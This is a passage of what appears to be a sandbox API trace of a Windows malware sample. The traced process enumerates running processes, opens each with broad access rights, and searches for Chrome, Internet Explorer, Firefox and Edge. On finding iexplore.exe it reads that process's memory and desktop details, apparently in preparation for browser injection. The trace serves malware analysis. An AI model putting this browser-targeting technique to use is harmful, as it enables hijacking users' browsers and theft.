	[0227.107] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0227.108] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5fd8
	[0227.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.108] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0227.108] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.108] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.109] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.109] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0227.110] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.110] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.110] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0227.111] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x5fdc
	[0227.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.111] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0227.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.111] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.111] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.111] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0227.112] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.112] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.112] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0227.113] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5fe0
	[0227.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.113] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0227.113] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.113] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.114] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0227.114] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.114] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.115] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0227.115] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5fe4
	[0227.115] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.115] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0227.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.116] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.116] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.116] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0227.117] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.117] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.117] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0227.118] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5fe8
	[0227.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.118] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0227.118] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.119] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.119] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0227.119] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.119] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.119] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0227.120] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x5fec
	[0227.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.120] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0227.120] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.120] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.121] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.121] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0227.122] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.122] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.122] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0227.123] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x5ff0
	[0227.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.123] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0227.123] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.123] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.124] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0227.124] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.124] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.125] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0227.125] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x5ff4
	[0227.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.126] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0227.126] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.126] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.127] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0227.127] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.128] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.128] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0227.129] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x5ff8
	[0227.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.129] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0227.129] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.129] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.130] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0227.130] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.130] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.131] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0227.131] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x5ffc
	[0227.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.132] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0227.132] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.132] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.133] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.133] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0227.134] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.134] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.134] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0227.135] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6004
	[0227.135] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.135] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0227.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.136] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.136] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.136] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0227.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.137] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.138] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.139] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6008
	[0227.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.139] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0227.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.139] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0227.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.140] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0227.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.140] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.140] NtQueryInformationProcess (in: ProcessHandle=0x6008, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0227.140] ReadProcessMemory (in: hProcess=0x6008, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0227.140] ReadProcessMemory (in: hProcess=0x6008, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0227.141] ReadProcessMemory (in: hProcess=0x6008, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0227.141] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0227.141] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x600c
	[0227.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.142] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0227.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.142] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0227.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.142] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0227.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.143] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.143] NtQueryInformationProcess (in: ProcessHandle=0x600c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0227.143] ReadProcessMemory (in: hProcess=0x600c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0227.143] ReadProcessMemory (in: hProcess=0x600c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0227.143] ReadProcessMemory (in: hProcess=0x600c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0227.143] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0227.143] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6010
	[0227.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.144] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0227.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.145] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.145] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0227.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.145] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.145] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0227.146] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6014
	[0227.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.146] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0227.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.147] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.147] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0227.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.147] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.148] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.148] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6018
	[0227.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.149] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.149] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.149] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.150] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.150] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.151] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.151] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x601c
	[0227.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.151] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.152] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.152] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.153] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.153] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.154] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6020
	[0227.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.154] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.154] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.154] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.155] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.155] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.156] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6024
	[0227.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.156] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0227.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.156] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.157] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0227.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.157] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.158] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0227.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6028
	[0227.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.159] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.159] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.159] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.160] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.160] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x602c
	[0227.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.161] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0227.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.161] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0227.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.161] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0227.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0227.162] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0227.162] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0227.163] CloseHandle (hObject=0x4fd0) returned 1
	[0227.163] Sleep (dwMilliseconds=0x64) 
	[0227.298] GetCurrentProcessId () returned 0x110
	[0227.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0227.300] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0227.301] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0227.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0227.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6030
